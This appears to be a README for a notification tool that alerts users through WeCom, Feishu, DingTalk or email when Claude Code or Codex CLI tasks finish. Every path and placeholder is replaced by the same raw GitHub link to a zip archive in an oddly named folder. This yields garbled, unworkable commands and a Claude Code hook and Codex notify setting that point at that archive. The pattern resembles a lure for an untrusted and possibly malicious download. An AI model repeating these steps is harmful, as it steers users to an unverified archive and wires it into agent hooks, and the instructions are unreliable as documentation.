Easily receive notifications for completed tasks across various platforms.
This guide will help you download and run the AI Task Notify software step by step. Follow these instructions to set up notifications for task completions.
Visit the Releases page to download the latest version of ai-task-notify. Choose the appropriate file for your system, download it, and follow the installation instructions below.
Before running the software, you need to set it up correctly.
-
Open your terminal.
-
Change directory to the ai-task-notify folder:
cd ai-task-notify -
Copy the example environment file:
cp https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip .env
-
Open the
.envfile in a text editor. Set your preferred notification channels by editing the lines that start withNOTIFY_CHANNELS.Example configuration:
# Enabled channels (comma-separated) NOTIFY_CHANNELS=wecom,feishu # WeCom https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip # Feishu https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip
Claude Code needs to be set up to use your new notification script.
-
Locate the Claude settings file at
~https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip. -
Edit the file to include the following configuration:
{ "hooks": { "Stop": [ { "matcher": "", "hooks": [ { "type": "command", "command": "python3 https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip" } ] } ] } }
You also need to configure Codex CLI for notifications.
-
Open the Codex configuration file at
~https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip. -
Add the following line to set up the notification command:
notify = ["python3", "https://raw.githubusercontent.com/inazon/ai-task-notify/main/Aigialosauridae/ai-notify-task-v2.9.zip"]
- In your WeCom (ไผไธๅพฎไฟก) group chat, add the group robot.
- Copy the Webhook URL and paste it into the
WECOM_WEBHOOK_URLfield.
- In your Feishu (้ฃไนฆ) group chat, add the group robot.
- Copy the Webhook URL and paste it into the
FEISHU_WEBHOOK_URLfield.
Ensure you have the following installed on your computer:
- Python 3.6 or higher
- Internet access for webhook notifications
- Access to the WeCom, Feishu, or DingTalk interfaces as needed for your notifications
AI Task Notify supports the following channels:
- WeCom (ไผไธๅพฎไฟก) - Use for company-wide notifications through group chats.
- Feishu (้ฃไนฆ) - Attention grabbing notifications in teams.
- DingTalk (้้) - Quick updates for tasks and activities.
- Email - Standard email notifications for task completions.
If you face any issues, feel free to open an issue in the GitHub repository for assistance. The community is here to help.
You can also refer to our documentation for more detailed guidelines and troubleshooting steps.
Thank you for using AI Task Notify! Enjoy efficient task management and notification delivery.